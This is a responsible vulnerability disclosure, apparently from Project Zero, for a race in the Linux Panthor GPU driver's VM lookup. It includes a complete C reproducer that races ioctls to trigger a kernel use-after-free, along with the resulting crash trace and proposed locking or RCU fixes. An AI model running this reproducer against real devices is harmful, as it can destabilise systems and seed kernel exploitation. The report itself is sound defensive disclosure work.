Introduction / Context As far as I know, while the Panthor driver is for widely-used hardware (the newer Arm Mali GPU models), the Panthor driver is not widely used yet. Smartphones and such currently still use the older non-upstream driver for the same hardware; the only devices I'm aware of that already use the Panthor driver are some single-board computers. So to the security@kernel and psirt@arm folks: I am reporting this as a security bug (to security@kernel because it's in upstream code, and to psirt@arm because it's in Arm's driver); but I don't think there is much urgency with bugs that are found this early. You can probably stop reading here unless you're one of the Panthor maintainers. Issue description panthor_vm_pool_get_vm() is racy: Without holding any relevant locks, it first calls xa_load(&pool->xa, handle) to turn a VM handle into a panthor_vm*, then calls panthor_vm_get() to increment the refcount of the panthor_vm. A concurrent DRM_IOCTL_PANTHOR_VM_DESTROY can destroy the panthor_vm in between. Reproducer I am testing on a "Rock 5B" single-board computer running the vendor kernel 6.1.43-19-rk2312 #428a0a5e6 because I haven't set up a kernel build environment for this device yet. But I have looked at the latest code in drm-misc and the issue still seems to exist there, too. My reproducer follows - it just keeps racing DRM_IOCTL_PANTHOR_VM_GET_STATE ioctls with DRM_IOCTL_PANTHOR_VM_DESTROY ioctls: // compile with -pthread #include #include #include #include #include #include #include #include "drm/panthor_drm.h" #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define GPU_PATH "/dev/dri/by-path/platform-fb000000.gpu-card" static int panthor_fd = -1; static void *thread_fn(void *dummy) { while (1) { struct drm_panthor_vm_get_state getstate_args = { .vm_id = 1 }; ioctl(panthor_fd, DRM_IOCTL_PANTHOR_VM_GET_STATE, &getstate_args); } } int main(void) { panthor_fd = SYSCHK(open(GPU_PATH, O_RDWR)); pthread_t thread; if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, "pthread_create"); while (1) { struct drm_panthor_vm_create create_args = { .flags = 0, .user_va_range = 0 /*kernel picks*/ }; SYSCHK(ioctl(panthor_fd, DRM_IOCTL_PANTHOR_VM_CREATE, &create_args)); assert(create_args.id == 1); struct drm_panthor_vm_destroy destroy_args = { .id = 1 }; SYSCHK(ioctl(panthor_fd, DRM_IOCTL_PANTHOR_VM_DESTROY, &destroy_args)); } } If you compile that and run it for a few seconds, you should get a warning about an attempt to increment a refcount that was zero: ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 6 PID: 2210 at lib/refcount.c:25 refcount_warn_saturate+0xa4/0x124 Modules linked in: [...] CPU: 6 PID: 2210 Comm: destroy-vs-get- Tainted: G O 6.1.43-19-rk2312 #428a0a5e6 Hardware name: Radxa ROCK 5B (DT) pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : refcount_warn_saturate+0xa4/0x124 lr : refcount_warn_saturate+0xa4/0x124 sp : ffff800010f8bbc0 x29: ffff800010f8bbc0 x28: ffff800010f8bd08 x27: 0000000000000008 x26: 0000ffffab60e938 x25: 0000000000000008 x24: ffff000028cc9800 x23: ffff000028cc9800 x22: ffff800010f8bd08 x21: ffff80000104d5b4 x20: ffff800010f8bd08 x19: ffff0001f2e71000 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 x14: 0000000000000000 x13: 2e656572662d7265 x12: 7466612d65737520 x11: 3b30206e6f206e6f x10: 697469646461203a x9 : ffff8000080dbc88 x8 : 206e6f206e6f6974 x7 : 69646461203a745f x6 : 746e756f63666572 x5 : ffff0001fb5c8a90 x4 : 000000000000000d x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0001f6d89f00 Call trace: refcount_warn_saturate+0xa4/0x124 refcount_inc+0x24/0x58 [panthor] panthor_vm_get+0x24/0x34 [panthor] panthor_vm_pool_get_vm+0x1c/0x24 [panthor] panthor_ioctl_vm_get_state+0x28/0x5c [panthor] drm_ioctl_kernel+0xa8/0xf8 drm_ioctl+0x2e0/0x324 vfs_ioctl+0x2c/0x48 __arm64_sys_ioctl+0x7c/0xac invoke_syscall+0x80/0x114 el0_svc_common.constprop.0+0xd0/0x120 do_el0_svc+0x98/0xbc el0_svc+0x24/0x48 el0t_64_sync_handler+0x90/0xf8 el0t_64_sync+0x174/0x178 [...] Fixing it I guess one way you could fix it would be to add locking around the lookup in panthor_vm_pool_get_vm(); but if you want to avoid locking there, you could probably instead RCU-delay the freeing of struct panthor_vm in panthor_vm_free(), and then in panthor_vm_pool_get_vm(), use rcu_read_lock() and kref_get_unless_zero() to locklessly try to grab a reference to the panthor_vm (which will succeed unless you raced with VM destruction). Disclosure deadline This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-02-03. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html Related CVE Number: CVE-2024-53080 Credit: Jann Horn